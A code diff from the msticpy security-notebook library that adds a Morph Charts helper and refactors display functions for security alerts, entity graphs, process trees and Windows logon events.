+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Morph Charts  class."""
+import json
+from pathlib import Path
+import yaml
+from IPython.display import IFrame
+import pandas as pd
+from ..common.exceptions import MsticpyException
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+_CHART_FOLDER = "morph_charts"
+
+
+class MorphCharts:
+    """Create Morph Charts package data and render Morph Charts site."""
+
+    def __init__(self):
+        """Create object and populate charts container."""
+        self.charts = _get_charts(_CHART_FOLDER)
+
+    def display(self, data: pd.DataFrame, chart_name: str) -> IFrame:
+        """
+        Prepare package data and display MorphChart in an IFrame.
+
+        Parameters
+        ----------
+        data: pd.DataFrame:
+            A DataFrame of data for the morphchart to plot.
+
+        chart_name: str:
+            The name of the Morph Chart to plot.
+
+        """
+        # Check input data is correct format and that the chart being requested exists
+        if not isinstance(data, pd.DataFrame):
+            raise MsticpyException("Data provided must be in pandas.DataFrame format")
+
+        if chart_name not in self.charts:
+            raise MsticpyException(
+                f"{chart_name} is not a vaid chart. Run list_charts() to see avaliable charts"  # pylint: disable=line-too-long
+            )
+
+        # Create description file with length of our data set
+        description_dict = self.charts[chart_name]["DescriptionFile"]
+        description_dict["tables"][0]["rows"] = len(data)
+        # Create output folder for package files
+        out_path = Path.cwd().joinpath(*["morphchart_package", "description.json"])
+        Path.mkdir(Path.cwd().joinpath("morphchart_package"), exist_ok=True)
+        # Write description file
+        with open(out_path, "w", encoding="utf-8") as morph_file:
+            json.dump(description_dict, morph_file)
+        # Write dataset to query_data csv
+        data_out_path = out_path = Path.cwd().joinpath(
+            *["morphchart_package", "query_data.csv"]
+        )
+        data.to_csv(data_out_path, index=False)
+        # Display Morph Charts in IFrame with instructions
+        print(
+            f"Navigate to {Path.cwd().joinpath('morphchart_package')} and upload the files below"
+        )
+        print("Charts provided by http://morphcharts.com/")
+        return IFrame("http://morphcharts.com/designer.html", "100%", "600px")
+
+    def list_charts(self):
+        """Get a list of avaliable charts."""
+        for key, _ in self.charts.items():
+            print(key)
+
+    def get_chart_details(self, chart_name):
+        """
+        Get description for a chart.
+
+        Parameters
+        ----------
+        chart_name: str:
+            The name of the chart you get description for.
+
+        """
+        try:
+            print(
+                chart_name,
+                ":",
+                "\n",
+                self.charts[chart_name]["Description"],
+                "\n",
+                "Query: ",
+                self.charts[chart_name]["Query"],
+            )
+        except KeyError as key_err:
+            raise KeyError(f"Unknown chart {chart_name}") from key_err
+
+    def search_charts(self, keyword):
+        """
+        Search for charts that match a keyword.
+
+        Parameters
+        ----------
+        keyword: str:
+            The keyword to search charts for.
+
+        """
+        for key, value in self.charts.items():
+            if keyword.casefold() in [tag.casefold() for tag in value["Tags"]]:
+                print(key, ":", "\n", value["Description"])
+            elif keyword.casefold() in [
+                word.casefold() for word in value["Description"].split()
+            ]:
+                print(key, ":", "\n", value["Description"])
+            else:
+                print("No matching charts found")
+
+
+def _get_charts(path: str = "morph_charts") -> dict:
+    """
+    Return dictionary of yaml files found in the Morph Charts folder.
+
+    Parameters
+    ----------
+    path : str
+        The source path to search in.
+
+    Returns
+    -------
+    Dict
+        Details of the chart files
+
+    """
+    full_path = Path(__file__).parent.parent.joinpath("data").joinpath(path)
+    file_glob = Path(full_path).glob("*.yaml")
+    chart_files = [file_path for file_path in file_glob if file_path.is_file()]
+    chart_details = {}
+    for chart in chart_files:
+        with open(chart, "r", encoding="utf-8") as chart_data:
+            details = yaml.safe_load(chart_data)
+        try:
+            chart_details.update(
+                {
+                    details["Name"]: {
+                        "Description": details["Description"],
+                        "Query": details["Query"],
+                        "Tags": details["Tags"],
+                        "DescriptionFile": details["DescriptionFile"],
+                    }
+                }
+            )
+        except KeyError as key_err:
+            raise Exception(
+                f"{chart} description does not appear to be in the correct format."
+            ) from key_err
+
+    return chart_details
diff --git a/msticpy/nbtools/nbdisplay.py b/msticpy/nbtools/nbdisplay.py
index 8f0523155..3e7c0c9d4 100644
--- a/msticpy/nbtools/nbdisplay.py
+++ b/msticpy/nbtools/nbdisplay.py
@@ -4,118 +4,116 @@
 # license information.
 # --------------------------------------------------------------------------
 """Module for common display functions."""
+from typing import Any, Mapping, Union, Tuple, List
 
-import matplotlib.pyplot as plt
 import networkx as nx
-import numpy as np
 import pandas as pd
-from bokeh.io import output_notebook, show
-from bokeh.models import (ColumnDataSource, DatetimeTickFormatter, HoverTool,
-                          Label)
-from bokeh.plotting import figure, reset_output
-from IPython.core.display import HTML, display
+from bokeh.io import output_notebook
+from bokeh.plotting import figure, from_networkx, show
+from bokeh.models import Circle, HoverTool, Label
+from deprecated.sphinx import deprecated
+import IPython
+from IPython.display import HTML, display
 from IPython.display import Javascript
 
+from .._version import VERSION
 from .security_alert import SecurityAlert
-from .utility import export
-from .. _version import VERSION
+
+# pylint: disable=unused-import
+from .timeline import display_timeline, display_timeline_values  # noqa
+from .process_tree import build_and_show_process_tree, plot_process_tree  # noqa
+
+# pylint: enable=unused-import
+from ..common.utility import export
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 
 @export
-def display_alert(alert=None, show_entities=False):
+def display_alert(
+    alert: Union[Mapping[str, Any], SecurityAlert], show_entities: bool = False
+):
     """
-    Display the alert properties as HTML.
+    Display a Security Alert.
+
+    Parameters
+    ----------
+    alert : Union[Mapping[str, Any], SecurityAlert]
+        The alert to display as Mapping (e.g. pd.Series)
+        or SecurityAlert
+    show_entities : bool, optional
+        Whether to display entities (the default is False)
 
-        :param alert: The alert to display
-            pd.Series or SecurityAlert
     """
-    if alert is None:
-        return
+    output = format_alert(alert, show_entities)
+    if not isinstance(output, tuple):
+        output = [output]
+    for disp_obj in output:
+        display(disp_obj)
 
+
+@export
+def format_alert(
+    alert: Union[Mapping[str, Any], SecurityAlert], show_entities: bool = False
+) -> Union[IPython.display.HTML, Tuple[IPython.display.HTML, pd.DataFrame]]:
+    """
+    Get IPython displayable Security Alert.
+
+    Parameters
+    ----------
+    alert : Union[Mapping[str, Any], SecurityAlert]
+        The alert to display as Mapping (e.g. pd.Series)
+        or SecurityAlert
+    show_entities : bool, optional
+        Whether to display entities (the default is False)
+
+    Returns
+    -------
+    Union[IPython.display.HTML, Tuple[IPython.display.HTML, pd.DataFrame]]
+        Single or tuple of displayable IPython objects
+
+    Raises
+    ------
+    ValueError
+        If the alert object is in an unknown format
+
+    """
     if isinstance(alert, SecurityAlert):
-        display(HTML(alert.to_html(show_entities=False)))
-        if show_entities:
-            for entity in alert.entities:
-                print(entity)
-        return
+        return HTML(alert.to_html(show_entities=show_entities))
 
     # Display subset of raw properties
     if isinstance(alert, pd.Series):
-        entity = (alert['CompromisedEntity']
-                  if 'CompromisedEntity' in alert
-                  else '')
-        title = '''
-            <h3>Alert: '{name}'</h3><br>time=<b>{start}</b>, entity=<b>{entity}</b>, id=<b>{id}</b>
-            '''.format(start=alert['StartTimeUtc'],
-                       name=alert['AlertDisplayName'],
-                       entity=entity,
-                       id=alert['SystemAlertId'])
-        display(HTML(title))
-        display(pd.DataFrame(alert))
-    else:
-        raise ValueError(
-            'Unrecognized alert object type ' + str(type(alert)))
-
-
-def _print_process(process_row: pd.Series):
-    if process_row.NodeRole == 'parent':
-        if process_row.Level > 1:
-            level = 0
-        else:
-            level = 1
-    elif process_row.NodeRole == 'source':
-        level = 2
-    elif process_row.NodeRole == 'child':
-        level = 3 + process_row.Level
-    else:
-        level = 2
-
-    spaces = 20 * level * 2
-    if process_row.NodeRole == 'source':
-        line1 = '''
-        <span style="color:red;font-weight:bold">[alert:lev{}] {} {}
-        [PID: {}, SubjSess:{}, TargSess:{}]</span>
-        '''.format(process_row.Level,
-                   process_row.TimeCreatedUtc,
-                   process_row.NewProcessName,
-                   process_row.NewProcessId,
-                   process_row.SubjectLogonId,
-                   process_row.TargetLogonId)
-    else:
-        line1 = '[{}:lev{}] {} <b>{}</b> [PID: {}, SubjSess:{}, TargSess:{}]'.format(
-            process_row.NodeRole,
-            process_row.Level,
-            process_row.TimeCreatedUtc,
-            process_row.NewProcessName,
-            process_row.NewProcessId,
-            process_row.SubjectLogonId,
-            process_row.TargetLogonId)
+        entity = alert["CompromisedEntity"] if "CompromisedEntity" in alert else ""
+        title = f"""
+            <h3>Selected Alert: '{alert["AlertDisplayName"]}'</h3>
+            <b>Alert_time:</b> {alert["StartTimeUtc"]},&nbsp;
+            <b>Compr_entity:</b> {entity},&nbsp;
+            <b>Alert_id:</b> {alert["SystemAlertId"]}
+            <br/>
+            """
+        return HTML(title), pd.DataFrame(alert)
 
-    line2 = '(Cmdline: \'{}\') [Account: \'{}\']'.format(
-        process_row.CommandLine, process_row.SubjectUserName)
-
-    display(HTML('<div style="margin-left:{indent}px">{txt}<br>{txt2}</div>'.format(indent=spaces,
-                                                                                    txt=line1,
-                                                                                    txt2=line2)))
+    raise ValueError("Unrecognized alert object type " + str(type(alert)))
 
 
 @export
 def display_process_tree(process_tree: pd.DataFrame):
     """
-    Display process tree data frame.
+    Display process tree data frame. (Deprecated).
 
-        :param process_tree
-    """
-    tree = process_tree[['TimeCreatedUtc', 'NodeRole', 'Level', 'NewProcessName',
-                         'CommandLine', 'SubjectUserName', 'NewProcessId', 'ProcessId',
-                         'SubjectLogonId', 'TargetLogonId']]
-    tree = tree.sort_values(by=['TimeCreatedUtc'], ascending=False)
+    Parameters
+    ----------
+    process_tree : pd.DataFrame
+        Process tree DataFrame
+
+    The display module expects the columns NodeRole and Level to
+    be populated. NoteRole is one of: 'source', 'parent', 'child'
+    or 'sibling'. Level indicates the 'hop' distance from the 'source'
+    node.
 
-    display(HTML("<h3>Alert process tree:</h3>"))
-    tree.sort_values(by=['TimeCreatedUtc']).apply(_print_process, 1)
+    """
+    build_and_show_process_tree(process_tree)
 
 
 @export
@@ -124,377 +122,306 @@ def exec_remaining_cells():
     Javascript("Jupyter.notebook.execute_cells_below()")
 
 
+@deprecated(
+    reason=(
+        "Matplotlib version 'draw_alert_entity_graph' "
+        "no longer supported - use 'plot_entity_graph'"
+    ),
+    version="0.3.2",
+)
 @export
-def draw_alert_entity_graph(nx_graph: nx.Graph, font_size: int = 12,
-                            height: int = 15, width: int = 15,
-                            margin: float = 0.3, scale: int = 1):
+# pylint: disable=too-many-arguments
+def draw_alert_entity_graph(
+    nx_graph: nx.Graph,
+    font_size: int = 12,
+    height: int = 8,
+    width: int = 8,
+    margin: float = 0.3,
+    scale: int = 1,
+):
     """
-    "Draw networkX graph with matplotlib.
-
-    Arguments:
-        nx_graph {networkx.graph} -- [description]
+    Draw networkX graph with matplotlib.
+
+    Parameters
+    ----------
+    nx_graph : nx.Graph
+        The NetworkX graph to draw
+    font_size : int, optional
+        base font size (the default is 12)
+    height : int, optional
+        Image height (the default is 8)
+    width : int, optional
+        Image width (the default is 8)
+    margin : float, optional
+        Image margin (the default is 0.3)
+    scale : int, optional
+        Position scale (the default is 1)
 
-    Keyword Arguments:
-        font_size {int} -- base font size (default: {12})
-        height {int} -- Image height (default: {15})
-        width {int} -- Image width (default: {20})
-        margin {float} -- Image margin (default: {0.3})
-        scale {int} -- Position scale (default: {1})
     """
-    alert_node = [n for (n, node_type) in
-                  nx.get_node_attributes(nx_graph, 'node_type').items()
-                  if node_type == 'alert']
-    entity_nodes = [n for (n, node_type) in
-                    nx.get_node_attributes(nx_graph, 'node_type').items()
-                    if node_type == 'entity']
-
-    # now draw them in subsets  using the `nodelist` arg
-    plt.rcParams['figure.figsize'] = (width, height)
-
-    plt.margins(x=margin, y=margin)
-
-    pos = nx.kamada_kawai_layout(nx_graph, scale=scale, weight='weight')
-    nx.draw_networkx_nodes(nx_graph, pos, nodelist=alert_node,
-                           node_color='red', alpha=0.5, node_shape='o')
-    nx.draw_networkx_nodes(nx_graph, pos, nodelist=entity_nodes,
-                           node_color='green', alpha=0.5, node_shape='s',
-                           s=200)
-    nlabels = nx.get_node_attributes(nx_graph, 'description')
-    nx.relabel_nodes(nx_graph, nlabels)
-    nx.draw_networkx_labels(nx_graph, pos, nlabels, font_size=font_size)
-    nx.draw_networkx_edges(nx_graph, pos)
-    elabels = nx.get_edge_attributes(nx_graph, 'description')
-    nx.draw_networkx_edge_labels(nx_graph, pos, edge_labels=elabels,
-                                 font_size=font_size * 2 / 3, alpha=0.6)
+    del margin
+    return plot_entity_graph(
+        entity_graph=nx_graph,
+        font_size=font_size,
+        height=height * 100,
+        width=width * 100,
+        scale=scale * 2,
+    )
 
 
-@export
-def display_timeline(data, alert=None, overlay_data=None, title: str = None,
-                     time_column: str = 'TimeGenerated',
-                     source_columns: list = None,
-                     overlay_colums: list = None,
-                     height: int = 300):
+def plot_entity_graph(
+    entity_graph: nx.Graph,
+    node_size: int = 25,
+    font_size: Union[int, str] = 10,
+    height: int = 800,
+    width: int = 800,
+    scale: int = 2,
+    hide: bool = False,
+) -> figure:
     """
-    Display a timeline of events.
-
-    Arguments:
-        data {pd.DataFrame} -- Input DataFrame
-
-    Keyword Arguments:
-        alert {SecurityAlert} -- Input alert (optional) (default: {None})
-        overlay_data {pd.DataFrame} -- Second event stream (DataFrame)
-            to display as overlay (default: {None})
-        title {str} -- [description] (default: {None})
-        time_column {str} -- The name of the time
-            property used in the Dataframe(s) (default: {'TimeGenerated'})
-        source_columns {list} -- List of source columns to use in
-            tooltips (default: {None})
-        overlay_colums {list} -- List of source columns to use in
-            overlay data tooltips (default: {None})
-        heigh {int} -- the height of the plot figure (under 300 limits access
-            to Bokeh tools)
+    Plot entity graph with Bokeh.
+
+    Parameters
+    ----------
+    entity_graph : nx.Graph
+        The entity graph as a networkX graph
+    node_size : int, optional
+        Size of the nodes in pixels, by default 25
+    font_size : int, optional
+        Font size for node labels, by default 10
+        Can be an integer (point size) or a string (e.g. "10pt")
+    width : int, optional
+        Width in pixels, by default 800
+    height : int, optional
+        Image height (the default is 800)
+    scale : int, optional
+        Position scale (the default is 2)
+    hide : bool, optional
+        Don't show the plot, by default False. If True, just
+        return the figure.
+
+    Returns
+    -------
+    bokeh.plotting.figure
+        The network plot.
+
     """
-    reset_output()
     output_notebook()
+    font_pnt = f"{font_size}pt" if isinstance(font_size, int) else font_size
+    node_attrs = {
+        node: attrs.get("color", "green")
+        for node, attrs in entity_graph.nodes(data=True)
+    }
+    nx.set_node_attributes(entity_graph, node_attrs, "node_color")
+
+    plot = figure(
+        title="Alert Entity graph",
+        x_range=(-3, 3),
+        y_range=(-3, 3),
+        width=width,
+        height=height,
+    )
 
-# pylint: disable=C0103
-    WRAP = 50
-    WRAP_CMDL = 'WrapCmdl'
-# pylint: enable=C0103
-    y_max = 1
-
-    if not source_columns:
-        source_columns = ['NewProcessName', 'EventID', 'CommandLine']
-    if time_column not in source_columns:
-        source_columns.append(time_column)
-
-    if 'CommandLine' in source_columns:
-        graph_df = data[source_columns].copy()
-        graph_df[WRAP_CMDL] = graph_df.apply(lambda x:
-                                             _wrap_text(x.CommandLine, WRAP),
-                                             axis=1)
-    else:
-        graph_df = data[source_columns].copy()
-
-    # if we have an overlay - add this data and shift the y co-ordinates to
-    # show on two separate lines
-    if overlay_data is not None:
-        overlay_colums = (overlay_colums if overlay_colums is not None
-                          else source_columns)
-        if time_column not in overlay_colums:
-            overlay_colums.append(time_column)
-        if 'CommandLine' in overlay_colums:
-            overlay_df = overlay_data[overlay_colums].copy()
-            overlay_df[WRAP_CMDL] = overlay_df.apply(lambda x:
-                                                     _wrap_text(
-                                                         x.CommandLine, WRAP),
-                                                     axis=1)
-        else:
-            overlay_df = overlay_data[overlay_colums].copy()
-        graph_df['y_index'] = 2
-        overlay_df['y_index'] = 1
-        y_max = 2
-    else:
-        graph_df['y_index'] = 1
-
-    source = ColumnDataSource(graph_df)
-
-    # build the tool tips from columns (excluding these)
-    excl_cols = [time_column, 'CommandLine']
-    tool_tip_items = [(f'{col}', f'@{col}')
-                      for col in source_columns if col not in excl_cols]
-    if WRAP_CMDL in graph_df:
-        tool_tip_items.append(('CommandLine', f'@{WRAP_CMDL}'))
-    hover = HoverTool(
-        tooltips=tool_tip_items,
-        formatters={'Tooltip': 'printf'}
-        # display a tooltip whenever the cursor is vertically in line with a glyph
-        # ,mode='vline'
+    plot.add_tools(
+        HoverTool(
+            tooltips=[
+                ("node_type", "@node_type"),
+                ("name", "@name"),
+                ("description", "@description"),
+                ("entitytype", "@entitytype"),
+            ]
+        )
     )
 
-    if not title:
-        title = 'Event Timeline'
-    else:
-        title = 'Timeline {}'.format(title)
-
-    # tools = 'pan, box_zoom, wheel_zoom, reset, undo, redo, save, hover'
-    plot = figure(min_border_left=50, plot_height=height, plot_width=900,
-                  x_axis_label='Event Time', x_axis_type='datetime', x_minor_ticks=10,
-                  tools=[hover, 'pan', 'xwheel_zoom', 'box_zoom', 'reset'],
-                  title=title)
-    plot.yaxis.visible = False
-
-    # Tick formatting for different zoom levels
-    # '%H:%M:%S.%3Nms
-    tick_format = DatetimeTickFormatter()
-    tick_format.days = ['%m-%d %H:%M']
-    tick_format.hours = ['%H:%M:%S']
-    tick_format.minutes = ['%H:%M:%S']
-    tick_format.seconds = ['%H:%M:%S']
-    tick_format.milliseconds = ['%H:%M:%S.%3N']
-
-    plot.xaxis[0].formatter = tick_format
-    plot.circle(x=time_column, y='y_index', color='navy',
-                alpha=0.5, size=10, source=source)
-
-    if overlay_data is not None:
-        overlay_source = ColumnDataSource(overlay_df)
-        plot.circle(x=time_column, y='y_index', color='green',
-                    alpha=0.5, size=10, source=overlay_source)
-
-    # Adding data labels stops everything working!
-    # labels = LabelSet(x=time_column, y='y_index', y_offset=5,
-    #                   text='NewProcessName', source=source,
-    #                   angle='90deg', text_font_size='8pt')
-    # p.add_layout(labels)
-
-    # if we have an alert, plot the time as a line
-    if alert is not None:
-        x_alert_label = pd.Timestamp(alert['StartTimeUtc'])
-        plot.line(x=[x_alert_label, x_alert_label], y=[0, y_max + 1])
-        alert_label = Label(x=x_alert_label, y=0, y_offset=10, x_units='data', y_units='data',
-                            text='< Alert time', render_mode='css',
-                            border_line_color='red', border_line_alpha=1.0,
-                            background_fill_color='white', background_fill_alpha=1.0)
-
-        plot.add_layout(alert_label)
-
-        print('Alert start time = ', alert['StartTimeUtc'])
-
-    show(plot)
-
-
-def _wrap_text(source_string, wrap_len):
-    if len(source_string) <= wrap_len:
-        return source_string
-    out_string = ''
-    input_parts = source_string.split()
-    out_line = ''
-    for part in input_parts:
-        if len(part) > wrap_len:
-            if out_line:
-                out_string += out_line + '\n'
-                out_line = ''
-            out_line = part[0:wrap_len] + '...'
-        else:
-            if out_line:
-                out_line += ' ' + part
-            else:
-                out_line = part
-            if len(out_line) > wrap_len:
-                out_string += out_line + '\n'
-                out_line = ''
-
-    return out_string
+    graph_renderer = from_networkx(
+        entity_graph, nx.spring_layout, scale=scale, center=(0, 0)
+    )
+    graph_renderer.node_renderer.glyph = Circle(
+        size=node_size, fill_color="node_color", fill_alpha=0.5
+    )
+    # pylint: disable=no-member
+    plot.renderers.append(graph_renderer)
+
+    # Create labels
+    for name, pos in graph_renderer.layout_provider.graph_layout.items():
+        label = Label(
+            x=pos[0],
+            y=pos[1],
+            x_offset=5,
+            y_offset=5,
+            text=name,
+            text_font_size=font_pnt,
+        )
+        plot.add_layout(label)
+    # pylint: enable=no-member
+    if not hide:
+        show(plot)
+    return plot
 
 
 # Constants for Windows logon
-_WIN_LOGON_TYPE_MAP = {0: 'Unknown',
-                       2: 'Interactive', 3: 'Network', 4: 'Batch', 5: 'Service',
-                       7: 'Unlock', 8: 'NetworkCleartext', 9: 'NewCredentials',
-                       10: 'RemoteInteractive', 11: 'CachedInteractive'}
-_WINDOWS_SID = {'S-1-0-0': 'Null SID', 'S-1-5-18': 'LOCAL_SYSTEM',
-                'S-1-5-19': 'LOCAL_SERVICE', 'S-1-5-20': 'NETWORK_SERVICE'}
-_ADMINISTRATOR_SID = '500'
-_GUEST_SID = '501'
-_DOM_OR_MACHINE_SID = 'S-1-5-21'
+_WIN_LOGON_TYPE_MAP = {
+    0: "Unknown",
+    2: "Interactive",
+    3: "Network",
+    4: "Batch",
+    5: "Service",
+    7: "Unlock",
+    8: "NetworkCleartext",
+    9: "NewCredentials",
+    10: "RemoteInteractive",
+    11: "CachedInteractive",
+}
+_WINDOWS_SID = {
+    "S-1-0-0": "Null SID",
+    "S-1-5-18": "LOCAL_SYSTEM",
+    "S-1-5-19": "LOCAL_SERVICE",
+    "S-1-5-20": "NETWORK_SERVICE",
+}
+_ADMINISTRATOR_SID = "500"
+_GUEST_SID = "501"
+_DOM_OR_MACHINE_SID = "S-1-5-21"
 
 
 @export
-def display_logon_data(logon_event: pd.DataFrame, alert: SecurityAlert = None,
-                       os_family: str = None):
+def display_logon_data(
+    logon_event: pd.DataFrame, alert: SecurityAlert = None, os_family: str = None
+):
     """
-    Display logon data for one or more events.
+    Display logon data for one or more events as HTML table.
+
+    Parameters
+    ----------
+    logon_event : pd.DataFrame
+        Dataframe containing one or more logon events
+    alert : SecurityAlert, optional
+        obtain os_family from the security alert
+        (the default is None)
+    os_family : str, optional
+         explicitly specify os_family (Linux or Windows)
+         (the default is None)
+
+    Notes
+    -----
+    Currently only Windows Logon events.
+
+    """
+    display(format_logon(logon_event, alert, os_family))
 
-    Arguments:
-        :logon_event: Dataframe containing one or more logon events
-        :security alert: obtain os_family from the security alert
-        :os_family: explicitly specify os_family (Linux or Windows)
+
+@export
+def format_logon(
+    logon_event: Union[pd.DataFrame, pd.Series],
+    alert: SecurityAlert = None,
+    os_family: str = None,
+) -> IPython.display.HTML:
+    """
+    Return logon data for one or more events as HTML table.
+
+    Parameters
+    ----------
+    logon_event : Union[pd.DataFrame, pd.Series]
+        Dataframe containing one or more logon events
+        or Series containing a single logon event.
+    alert : SecurityAlert, optional
+        obtain os_family from the security alert
+        (the default is None)
+    os_family : str, optional
+         explicitly specify os_family (Linux or Windows)
+         (the default is None)
+
+    Returns
+    -------
+    IPython.display.HTML :
+        HTML display object
 
     """
     if not os_family:
-        os_family = alert.os_family if alert else 'Windows'
-
-    for _, logon_row in logon_event.iterrows():
-        print('### Account Logon')
-        print('Account: ', logon_row['TargetUserName'])
-        print('Account Domain: ', logon_row['TargetDomainName'])
-        print('Logon Time: ', logon_row['TimeGenerated'])
-
-        if os_family == 'Windows':
-            logon_type = logon_row['LogonType']
-            logon_desc_idx = logon_type
-            if logon_type not in _WIN_LOGON_TYPE_MAP:
-                logon_desc_idx = 0
-            print(f'Logon type: {logon_type} ({_WIN_LOGON_TYPE_MAP[logon_desc_idx]})')
-
-        account_id = logon_row.TargetUserSid
-        print('User Id/SID: ', account_id)
-        if os_family == 'Windows':
-            _print_sid_info(account_id)
-        else:
-            print('Audit user: ', logon_row['audit_user'])
-
-        session_id = logon_row['TargetLogonId']
-        print(f'Session id \'{session_id}\'', end='  ')
-        if session_id == '0x3e7' or session_id == '-1':
-            print('System logon session')
-
-        print()
-        domain = logon_row['SubjectDomainName']
-        if not domain:
-            subj_account = logon_row.SubjectUserName
-        else:
-            subj_account = f'{domain}/{logon_row.SubjectUserName}'
-        print('Subject (source) account: ', subj_account)
-
-        print('Logon process: ', logon_row['LogonProcessName'])
-        print('Authentication: ', logon_row['AuthenticationPackageName'])
-        print('Source IpAddress: ', logon_row['IpAddress'])
-        print('Source Host: ', logon_row['WorkstationName'])
-        print('Logon status: ', logon_row['Status'])
-        print()
-
-
-def _print_sid_info(sid):
+        os_family = alert.os_family if alert else "Windows"
+
+    logon_output = []
+    if isinstance(logon_event, pd.DataFrame):
+        for _, logon_row in logon_event.iterrows():
+            logon_record = _fmt_single_row(logon_row, os_family)
+            logon_output.append(
+                "<tr class='cell_logon'><td class='cell_logon'>"
+                + f"{'<br>'.join(logon_record)}</td></tr>"
+            )
+    elif isinstance(logon_event, pd.Series):
+        logon_record = _fmt_single_row(logon_event, os_family)
+        logon_output.append(
+            "<tr class='cell_logon'><td class='cell_logon'>"
+            + f"{'<br>'.join(logon_record)}</td></tr>"
+        )
+
+    t_style = """
+        <style>
+            .table_logon {border-collapse: collapse; width: 50%;}
+            .cell_logon {border: 1px solid #ddd !important;
+                text-align: left !important; padding: 15px !important;}
+        </style>
+        """
+    return HTML(f"{t_style}<table class='table_logon'>{''.join(logon_output)}</table>")
+
+
+def _fmt_single_row(logon_row: pd.Series, os_family: str) -> List[str]:
+    """Format a pandas series logon record."""
+    logon_record = [
+        f"<b>Account: </b>{logon_row['TargetUserName']}",
+        f"<b>Account Domain: </b>{logon_row['TargetDomainName']}",
+        f"<b>Logon Time: </b>{logon_row['TimeGenerated']}",
+    ]
+
+    if os_family == "Windows":
+        logon_type = logon_row["LogonType"]
+        logon_desc_idx = logon_type
+        if logon_type not in _WIN_LOGON_TYPE_MAP:
+            logon_desc_idx = 0
+        logon_record.append(
+            f"<b>Logon type: </b>{logon_type}"
+            + f"({_WIN_LOGON_TYPE_MAP[logon_desc_idx]})"
+        )
+
+    account_id = logon_row.TargetUserSid
+    logon_record.append(f"<b>User Id/SID: </b>{account_id}")
+    if os_family == "Windows":
+        logon_record.extend(_format_sid_info(account_id))
+    else:
+        logon_record.append(f"<b>Audit user: </b>{logon_row['audit_user']}")
+
+    session_id = logon_row["TargetLogonId"]
+    sess_id = f"<b>Session id: </b>'{session_id}'"
+    if session_id in ["0x3e7", "-1"]:
+        sess_id += "System logon session"
+    logon_record.append("")
+
+    domain = logon_row["SubjectDomainName"]
+    if not domain:
+        subj_account = logon_row.SubjectUserName
+    else:
+        subj_account = f"{domain}/{logon_row.SubjectUserName}"
+    logon_record.append(f"<b>Subject (source) account: </b>{subj_account}")
+
+    logon_record.append(f"<b>Logon process: </b>{logon_row['LogonProcessName']}")
+    logon_record.append(
+        f"<b>Authentication: </b>{logon_row['AuthenticationPackageName']}"
+    )
+    logon_record.append(f"<b>Source IpAddress: </b>{logon_row['IpAddress']}")
+    logon_record.append(f"<b>Source Host: </b>{logon_row['WorkstationName']}")
+    logon_record.append(f"<b>Logon status: </b>{logon_row['Status']}")
+    logon_record.append("")
+    return logon_record
+
+
+def _format_sid_info(sid):
+    sid_info = []
+    if not sid:
+        return sid_info
     if sid in _WINDOWS_SID:
-        print('    SID {} is {}'.format(sid, _WINDOWS_SID[sid]))
+        sid_info.append(f"&nbsp;&nbsp;SID {sid} is {_WINDOWS_SID[sid]}")
     elif sid.endswith(_ADMINISTRATOR_SID):
-        print('    SID {} is administrator'.format(sid))
+        sid_info.append(f"&nbsp;&nbsp;SID {sid} is administrator")
     elif sid.endswith(_GUEST_SID):
-        print('    SID {} is guest'.format(sid))
+        sid_info.append(f"&nbsp;&nbsp;SID {sid} is guest")
     if sid.startswith(_DOM_OR_MACHINE_SID):
-        print('    SID {} is local machine or domain account'.format(sid))
-
-
-@export
-def plot_cluster(db_cluster, data, X, plot_label=None, plot_features=[0, 1], verbose=False,
-                 cut_off=3, xlabel=None, ylabel=None):
-    """
-    Plot clustered data as scatter chart
-
-    Arguments:
-        db_cluster {[type]} -- DBScan Cluster (from SkLearn DBSCAN)
-        data {[type]} -- Dataframe containing original data
-        X {[type]} -- The DBSCAN predict numpy array
-
-    Keyword Arguments:
-        plot_label {str} -- If set the column to use to label data points
-            (default: {None})
-        plot_features {list} -- [description] Which two features in X to plot
-        verbose {bool} -- Verbose execution with some extra info (default: {False})
-        cut_off {int} -- The cluster size below which items are considered
-            outliers (default: {3})
-        xlabel {[type]} -- x-axis label (default: {None})
-        ylabel {[type]} -- y-axis label (default: {None})
-    """
-    if plot_features[0] >= X.shape[1]:
-        raise ValueError("plot_features[0] index must be a value from 0 to {}."
-                         .format(X.shape[1] - 1))
-    if plot_features[1] >= X.shape[1]:
-        raise ValueError("plot_features[1] index must be a value from 0 to {}."
-                         .format(X.shape[1] - 1))
-    if plot_features[0] == plot_features[1]:
-        raise ValueError("plot_features indexes must be 2 different values in range 0 to {}."
-                         .format(X.shape[1] - 1))
-
-    labels = db_cluster.labels_
-    core_samples_mask = np.zeros_like(labels, dtype=bool)
-    core_samples_mask[db_cluster.core_sample_indices_] = True
-    unique_labels = set(labels)
-    colors = [plt.cm.Spectral(each)
-              for each in np.linspace(0, 1, len(unique_labels))]
-    # Number of clusters in labels, ignoring noise if present.
-    n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
-    n_noise_ = list(labels).count(-1)
-    _, counts = np.unique(labels, return_counts=True)
-
-    if verbose:
-        print('Estimated number of clusters: %d' % n_clusters_)
-        print('Estimated number of noise points: %d' % n_noise_)
-        # print("Silhouette Coefficient: %0.3f"
-        #       % metrics.silhouette_score(X, labels))
-
-    if not isinstance(data, pd.DataFrame):
-        plot_label = None
-    elif plot_label is not None and plot_label not in data:
-        plot_label = None
-
-    p_label = None
-    for cluster_id, color in zip(unique_labels, colors):
-        if cluster_id == -1:
-            # Black used for noise.
-            color = [0, 0, 0, 1]
-        class_member_mask = (labels == cluster_id)
-
-        cluster_size = counts[cluster_id]
-        marker_size = cluster_size
-        marker = 'o'
-        font_size = 'small'
-        alpha = 0.4
-
-        if cluster_size < cut_off:
-            marker = '+'
-            marker_size = 10
-            font_size = 'large'
-            alpha = 1.0
-        first_row = data[class_member_mask].iloc[0]
-        xy = X[class_member_mask & core_samples_mask]
-        plt.plot(xy[:, plot_features[0]], xy[:, plot_features[1]], marker,
-                 markerfacecolor=tuple(color),
-                 markersize=marker_size)
-
-        if plot_label:
-            if len(first_row) > 0 and plot_label in first_row:
-                p_label = first_row[plot_label]
-                try:
-                    plt.annotate(s=p_label, xy=(xy[0, plot_features[0]], xy[0, plot_features[1]]),
-                                 fontsize=font_size, alpha=alpha)
-                except IndexError:
-                    pass
-
-    plt.xlabel(xlabel)
-    plt.ylabel(ylabel)
-    plt.title('Estimated number of clusters: %d' % n_clusters_)
